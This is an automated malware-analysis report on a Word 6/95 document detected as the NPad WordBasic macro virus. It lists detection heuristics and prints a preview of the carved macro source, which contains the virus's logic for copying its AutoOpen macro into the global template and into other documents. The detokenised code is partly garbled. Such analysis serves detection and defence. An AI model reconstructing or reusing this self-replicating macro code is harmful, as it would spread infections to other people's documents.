MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits legacy WordBasic macro virus markers and is explicitly detected by ClamAV as Win.Trojan.NPad-1. The document body contains numerous strings related to macro virus functions and historical context, including references to 'RSN MACRO VIRUS' and 'NPad', indicating its nature as a macro-based threat. The presence of 'AutoOpen' suggests automatic execution upon opening.
Heuristics 3
-
ClamAV: Win.Trojan.NPad-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.NPad-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCEThe Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
wordbasic_macros.txt |
wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 1588 bytes |
SHA-256: db1e6b786a098c6660cd7e679f01e539cab3e99950e71edd43860ebabc13dfc2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
= REM D0EUNPAD94, v.2.21, (c)'Maret 1996, Bandung, Indonesia REM Macro MsWord virus, multiplatform, multi versi MacDoc$ Status MAIN @cmd809e 1 @cmd80d6 0 , - * finish MacDoc$ = @cmd818e CopyToGlobal Status 0 CopyToFile JAkses$ = @cmd8045 " Compatibility " , "NPad328" Bcopytoall = @cmd8006 Jakses$ Bcopytoall = 23 Aksi Bcopytoall 23 Jopen = Bcopytoall = 1 Bcopytoall = 23 Jopen = 0 Jakses$ = @cmd8007 jOpen @cmd8046 "Compatibility" , "NPad328" , JAkses$ err 0 aksi CopyToGlobal , - * finish MacVir$ = MacDoc$ = ":AutoOpen" Encrypt = @cmd80c3 MacVir$ Encrypt 0 @cmd80c2 MacVir$ , "Global:AutoOpen" , 1 Encrypt = 0 Status = 1 Encrypt 0 Status = err CopyToFile , - * finish dlg @cmd0054 dlg DocFormat = dlg DocFormat 1 * finish MacVir$ = MacDoc$ = ":AutoOpen" MacTDoc$ = @cmd8025 = ":AutoOpen" DocFormat 1 @cmd0054 = @cmd8025 , = 1 Encrypt = @cmd80c3 MacVir$ Encrypt 0 @cmd80c2 MacVir$ , MacTDoc$ , 1 @cmd0053 Aksi , - * finish Jarak$ = " " me$ = "D0EUNPAD94, v.2.21, (c) Maret 1996, Bandung, Indonesia" my$ = jarak$ = me$ KeKanan my$ , 30 KeKiri my$ , 15 , 10 GeserKanan me$ , 15 , 15 KeKiri my$ , 15 , 30 GeserKanan Me$ , 15 , 45 KeKiri My$ , @cmd8003 my$ , 100 GeserKanan kal$ , jumlah , waktu kal1$ = kal$ hitung = 1 jumlah kal1$ = " " = kal1$ kal1$ Tunggu waktu hitung KeKanan Kal$ , Waktu hitung = 0 @cmd8003 kal$ letak = hitung Myname$ = @cmd8009 Kal$ , Letak myname$ Tunggu waktu hitung KeKiri Kal$ , batas , Waktu hitung = 0 batas letak = @cmd8003 Kal$ hitung Myname1$ = @cmd8009 Kal$ , Letak myname1$ Tunggu Waktu hitung Tunggu waktu hitungan = 0 waktu hitungan |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.